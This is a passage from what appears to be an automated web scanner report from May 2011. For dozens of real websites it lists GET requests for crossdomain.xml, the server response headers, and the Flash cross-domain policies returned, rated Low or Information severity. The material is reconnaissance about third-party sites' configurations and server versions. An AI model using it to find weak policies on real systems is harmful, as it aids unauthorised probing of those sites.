   <allow-access-from domain="*.hipcast.com" />
...[SNIP]...

7.239. http://www.webcampromotions.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.webcampromotions.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webcampromotions.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:21 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
Last-Modified: Tue, 19 Apr 2011 16:32:46 GMT
Accept-Ranges: bytes
Content-Length: 293
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml
X-Pad: avoid browser bug

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="promos.naked.com"/>
<allow-access-from domain="*.fantasti.cc"/>
<allow-access-from domain="fantasti.cc"/>
<allow-access-from domain="wildnews.com"/>
<allow-access-from domain="naked.com"/>
...[SNIP]...

7.240. http://www.wofford.edu/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.wofford.edu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wofford.edu

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 24 Aug 2010 14:12:28 GMT
Accept-Ranges: bytes
ETag: "0ae16629643cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:24:18 GMT
Connection: close
Content-Length: 215

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" />
</cross
...[SNIP]...

7.241. http://www.woodsmith.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.woodsmith.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.woodsmith.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:26 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 21:12:58 GMT
ETag: "128004-a3-4940445c28a80"
Accept-Ranges: bytes
Content-Length: 163
X-Internal-Server: web1
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*.augusthome.com" />
</cross-domain-policy>

7.242. http://www.xstreetsl.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.xstreetsl.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xstreetsl.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:20:14 GMT
Server: Apache/2.2
Last-Modified: Wed, 09 Mar 2011 17:05:44 GMT
ETag: "13b8113-1a4-49e0fbd45aa00"
Accept-Ranges: bytes
Content-Length: 420
Content-Type: application/xml
X-Cache: MISS from localhost.localdomain
X-Cache-Lookup: MISS from localhost.localdomain:3128
Via: 1.0 localhost.localdomain:3128 (squid/2.6.STABLE20)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cog1.com" secure="false"/>

...[SNIP]...
<allow-access-from domain="*.secondlife.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.xstreetsl.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="s3.amazonaws.com" secure="false"/>
...[SNIP]...

7.243. http://www.zapak.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.zapak.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zapak.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:02 GMT
Server: ZWS
Last-Modified: Mon, 06 Apr 2009 15:30:14 GMT
ETag: "594199-1f6-466e493238d80"
Accept-Ranges: bytes
Content-Length: 502
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.zapak.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bigadda.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.krishcricket.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="124.125.91.250" to-ports="*"/>
...[SNIP]...

7.244. http://www.zdnetasia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.zdnetasia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zdnetasia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:12 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 10:58:18 GMT
ETag: "641f9-3a2-49e976c1e0680"
Accept-Ranges: bytes
Content-Length: 930
Keep-Alive: timeout=3, max=73
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.cnetnetworks.com.au"/>
   <allow-access-from domain="*.tvau.com.au"/>
   <allow-access-from domain="*.cbsinteractive.com.au"/>
   <allow-access-from domain="*.bnetau.com.au"/>
   <allow-access-from domain="*.zdnet.com.au"/>
   <allow-access-from domain="*.zdnetasia.com"/>
   <allow-access-from domain="*.cnet.com.au"/>
   <allow-access-from domain="*.builderau.com.au"/>
   <allow-access-from domain="*.adikted.tv"/>
   <allow-access-from domain="*.applesource.com.au"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.ds.serving-sys.com"/>
<allow-access-from domain="vidtech.cbsinteractive.com"/>
   <allow-access-from domain="*.cnet.com"/>
...[SNIP]...

7.245. http://www.zegeridotc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.zegeridotc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zegeridotc.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:06 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1304418606839431; path=/; expires=Wed, 02-May-12 10:30:06 GMT
Last-Modified: Wed, 21 Jul 2010 19:19:51 GMT
ETag: "1149ee-141-af9183c0"
Accept-Ranges: bytes
Content-Length: 321
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerwww.zegeridotc.com-HTTP=2710245548.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.euro-rscg-nyc.com" />
   <allow-access-from domain="euro-rscg-nyc.com" />
   <allow-access-from domain="www.euro-rscg-nyc.com" />
...[SNIP]...

7.246. http://www.123-reg.co.uk/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.123-reg.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.123-reg.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Dec 2008 16:28:16 GMT
ETag: "80e8c-dc-ee5c2800"
Accept-Ranges: bytes
Content-Length: 220
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="webfusion.co.uk " />
<allow-access-from domain="www.webfusion.co.uk" />
</c
...[SNIP]...

7.247. http://www.20minutos.es/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.20minutos.es
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.20minutos.es

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 08 Mar 2010 09:12:32 GMT
ETag: "1c6d45-e1-48146770ee000"
Vary: Accept-Encoding
X-20M-WebServer: frontal-01
Content-Type: text/xml
Content-Length: 225
Date: Tue, 03 May 2011 11:06:37 GMT
X-Varnish: 482945498
Age: 0
Via: 1.1 varnish
Connection: close
X-20M-Cache: 01

<?xml version="1.0" ?>
<cross-domain-policy>
   <allow-access-from domain="estaticos.20minutos.es" />
   <allow-access-from domain="blogs.20minutos.es" />
   <allow-access-from domain="openx.20minutos.es" />
...[SNIP]...

7.248. http://www.adddev2.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adddev2.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adddev2.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.1
Last-Modified: Tue, 06 Jul 2010 19:54:12 GMT
ETag: "4b80223-265-48abd6acb4100"
Accept-Ranges: bytes
Content-Length: 613
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="adddev2.com" />
   <allow-access-from domain="facebook.com" />
   <allow-access-from domain="apps.facebook.com" />
   <allow-access-from domain="connect.facebook.com" />
   <allow-access-from domain="channel.facebook.com" />
...[SNIP]...

7.249. http://www.avaloncommunities.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.avaloncommunities.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.avaloncommunities.com

Response

HTTP/1.1 200 OK
Content-Length: 404
Content-Type: text/xml
Content-Location: http://www.avaloncommunities.com/crossdomain.xml
Last-Modified: Mon, 03 Apr 2006 17:48:21 GMT
Accept-Ranges: bytes
ETag: "c6633acc4657c61:1fa4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:19:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.avaloncommunities
...[SNIP]...
<allow-access-from domain="avaloncommunities.com" />
...[SNIP]...
<allow-access-from domain="avaloncommunities.com" />
...[SNIP]...

7.250. http://www.bhgrealestate.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhgrealestate.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bhgrealestate.com

Response

HTTP/1.1 200 OK
Content-Length: 220
Content-Type: text/xml
Content-Location: http://www.bhgrealestate.com/crossdomain.xml
Last-Modified: Fri, 26 Jun 2009 16:14:46 GMT
Accept-Ranges: bytes
ETag: "09fba3879f6c91:131c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:21:42 GMT
Connection: close
Set-Cookie: BIGipServervip_64.37.197.236_http=3442093834.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</
...[SNIP]...

7.251. http://www.boomkat.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boomkat.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boomkat.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Cache-Control: max-age=31536000
Content-Type: text/xml
Content-Location: http://www.boomkat.com/crossdomain.xml
Date: Tue, 03 May 2011 10:41:00 GMT
Accept-Ranges: bytes
ETag: "35cbe31bf64cc1:13d3"
Connection: close
Last-Modified: Wed, 27 Apr 2011 16:13:56 GMT
X-Powered-By: ASP.NET
Content-Length: 804

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="boomkat.com" />
<allow-acc
...[SNIP]...
<allow-access-from domain="static.boomkat.com" />
<allow-access-from domain="playground.static.boomkat.com.s3.amazonaws.com" />
<allow-access-from domain="development.static.boomkat.com.s3.amazonaws.com" />
<allow-access-from domain="staging.www.boomkat.com" />
<allow-access-from domain="www.staging.boomkat.com" />
<allow-access-from domain="staging.springbolt.cluster" />
<allow-access-from domain="boomkatcom.springbolt.cluster" />
<allow-access-from domain="14tracks.com" />
<allow-access-from domain="www.14tracks.com" />
...[SNIP]...

7.252. http://www.coahomacc.edu/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.coahomacc.edu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.coahomacc.edu

Response

HTTP/1.1 200 OK
Content-Length: 143
Content-Type: text/xml
Last-Modified: Wed, 12 Dec 2007 16:28:17 GMT
Accept-Ranges: bytes
ETag: "1000dc3cc81:241e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:06:22 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="www.coahomacc.edu" />
<allow-access-from domain="coahomacc.edu" />
</cross-domain-policy>

7.253. http://www.costore.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.costore.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.costore.com

Response

HTTP/1.1 200 OK
Content-Length: 218
Content-Type: text/xml
Last-Modified: Tue, 26 Apr 2011 19:12:53 GMT
Accept-Ranges: bytes
ETag: "63d67ef1454cc1:17a0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:31:47 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www8.costore.com"/>
</cr
...[SNIP]...

7.254. http://www.doctorswithoutborders.org/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.doctorswithoutborders.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.doctorswithoutborders.org

Response

HTTP/1.1 200 OK
Content-Length: 287
Content-Type: text/xml
Content-Location: http://www.doctorswithoutborders.org/crossdomain.xml
Last-Modified: Wed, 27 Oct 2010 14:13:34 GMT
Accept-Ranges: bytes
ETag: "07bdd23e175cb1:1272"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:35:45 GMT
Connection: close

<?xml version="1.0"?>


    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


    <cross-domain-policy>


    <allow-access-from domain="www.msf.ca" />

       <allow-access-from domain="msf.ca" />
...[SNIP]...

7.255. http://www.donga.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.donga.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.donga.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:59 GMT
Server: Apache
Last-Modified: Tue, 06 Jul 2010 09:08:45 GMT
Accept-Ranges: bytes
Content-Length: 411
Content-Type: application/xml
Via: 1.1 jaguar04 (jaguar/3.0-11)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.donga.com" />
<allow-access-from domain="etv.donga.com" />
<allow-access-from domain="reuters.donga.com" />
<allow-access-from domain="adimg.donga.com" />
<allow-access-from domain="ar.donga.com" />
...[SNIP]...

7.256. http://www.eaglesband.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eaglesband.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eaglesband.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 14 Jun 2005 18:34:08 GMT
ETag: "55d0262-145-e1b70800"
Accept-Ranges: bytes
Content-Length: 325
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.eaglesband.com" /
...[SNIP]...
<allow-access-from domain="eaglesband.com" />
<allow-access-from domain="72.10.44.147:8443/" />
...[SNIP]...

7.257. http://www.emporia.edu/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.emporia.edu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emporia.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:24:01 GMT
Server: Apache/2.2.15 (Linux/SUSE)
Last-Modified: Fri, 11 Feb 2011 21:11:01 GMT
ETag: "28502-f3-49c0822998340"
Accept-Ranges: bytes
Content-Length: 243
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="www.emporia.edu" />
<allow-access-from domain="emporia.edu" />
<allow-access-from domain="darknessfalls.emporia.edu" />
<allow-access-from domain="cms.emporia.edu" />
...[SNIP]...

7.258. http://www.figures.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.figures.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.figures.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 08 Feb 2010 04:15:38 GMT
ETag: "108800a-161-47f0f0db44e80"
Accept-Ranges: bytes
Content-Length: 353
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="www.figures.com" />
<allow-access-from domain="figures.com" />
<allow-access-from domain="www.onesixthwarriors.com" />
<allow-access-from domain="onesixthwarriors.com" />
<allow-access-from domain="www.yojoe.com" />
<allow-access-from domain="yojoe.com" />
...[SNIP]...

7.259. http://www.firstweber.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.firstweber.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.firstweber.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:56 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) mod_jk/1.2.14 PHP/4.4.0-1
Last-Modified: Wed, 19 Jan 2011 22:03:44 GMT
ETag: "6bb8c-10e-30c77000"
Accept-Ranges: bytes
Content-Length: 270
Content-Type: application/xml
Via: 1.0 www.firstweber.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="firstweber.com" />
<allow-access-from domain="firstweber.vptesting.com" />
...[SNIP]...

7.260. http://www.fly2houston.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fly2houston.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fly2houston.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 152
Content-Type: text/xml
Expires: -1
Last-Modified: Fri, 15 Aug 2008 02:34:26 GMT
Accept-Ranges: bytes
ETag: "93a6b76f7ffec81:595"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:52:32 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="www.gocampaign.com" />
<allow-access-from domain="system.gocampaign.com" />
</cross-domain-policy>

7.261. http://www.fvtc.edu/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fvtc.edu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fvtc.edu

Response

HTTP/1.1 200 OK
Content-Length: 259
Content-Type: text/xml
Last-Modified: Wed, 28 Oct 2009 18:12:29 GMT
Accept-Ranges: bytes
ETag: "3e3e936fa57ca1:40c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:30:11 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="www.dev.thecjportal.org" secure="false" />
<allow-access-from domain="www.thecjportal.org" secure="false" />
...[SNIP]...

7.262. http://www.hostesscakes.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostesscakes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hostesscakes.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 16 Feb 2010 00:07:24 GMT
Accept-Ranges: bytes
ETag: "cfd8f49caeca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:33:30 GMT
Connection: close
Content-Length: 467

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="www.hostesscakes.com" /><allow-access-from domain="hostesscakes.com" />
...[SNIP]...
<allow-access-from domain="hostess" /><allow-access-from domain="hostesscakes.br-lab.com" />
...[SNIP]...

7.263. http://www.idahopress.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.idahopress.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.idahopress.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2043944
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 11:37:15 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0322
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: idahopress.com
X-TNCMS-Served-By: cmsapp5
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.264. http://www.indianagazette.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.indianagazette.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.indianagazette.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2115228
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:30:09 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0381
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: indianagazette.com
X-TNCMS-Served-By: cmsapp9
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.265. http://www.jimmyjohns.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jimmyjohns.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jimmyjohns.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 27 Aug 2007 16:22:09 GMT
Accept-Ranges: bytes
ETag: "e2ee9b6ac6e8c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:29:33 GMT
Connection: close
Content-Length: 279

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.jimmyjohns.com" />

...[SNIP]...
<allow-access-from domain="public.jimmyjohns.com" />
...[SNIP]...

7.266. http://www.justjigsawpuzzles.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.justjigsawpuzzles.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.justjigsawpuzzles.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:16:30 GMT
Server: Apache/2.0.54
Last-Modified: Thu, 21 Aug 2008 21:21:11 GMT
ETag: "e87725-119-e66a5fc0"
Accept-Ranges: bytes
Content-Length: 281
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="justjigsawpuzzles.com" />

...[SNIP]...

7.267. http://www.kspr.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kspr.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kspr.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8l mod_onsint/1.0
Last-Modified: Mon, 02 Aug 2010 18:49:57 GMT
ETag: "59ace9-d6-aabbbf40"
Accept-Ranges: bytes
Content-Length: 214
Content-Type: application/xml
Date: Tue, 03 May 2011 10:59:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="media.trb.com" />
</cross-d
...[SNIP]...

7.268. http://www.lattc.edu/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lattc.edu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lattc.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:27 GMT
Server: Oracle HTTP Server Powered by Apache/1.3.19 (Win32) PHP/5.2.8 mod_ssl/2.8.1 OpenSSL/0.9.5a mod_fastcgi/2.2.10 mod_oprocmgr/1.0 mod_perl/1.25
Last-Modified: Sat, 07 Feb 2009 00:11:19 GMT
ETag: "0-90-498cd1a7"
Accept-Ranges: bytes
Content-Length: 144
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="www.lattc.edu" />
<allow-access-from domain="lattc.edu" />
</cross-domain-policy>

7.269. http://www.lightreading.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lightreading.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lightreading.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 03 May 2011 10:30:15 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 24 Mar 2009 20:50:22 GMT
Accept-Ranges: bytes
ETag: "07b1f26c2acc91:0"
X-Powered-By: ASP.NET
Content-Length: 232

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="img.lightreading.com" />
<allow-access-from domain="admin.brightcove.com" />
...[SNIP]...

7.270. http://www.market4free.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.market4free.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.market4free.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Sun, 29 Mar 2020 00:00:00 GMT
Last-Modified: Thu, 25 Feb 2010 11:08:25 GMT
Accept-Ranges: bytes
ETag: "60c997d9ab6ca1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 10:39:16 GMT
Connection: close
Content-Length: 122

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="media.market4free.com" />
</cross-domain-policy>

7.271. http://www.maysville-online.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
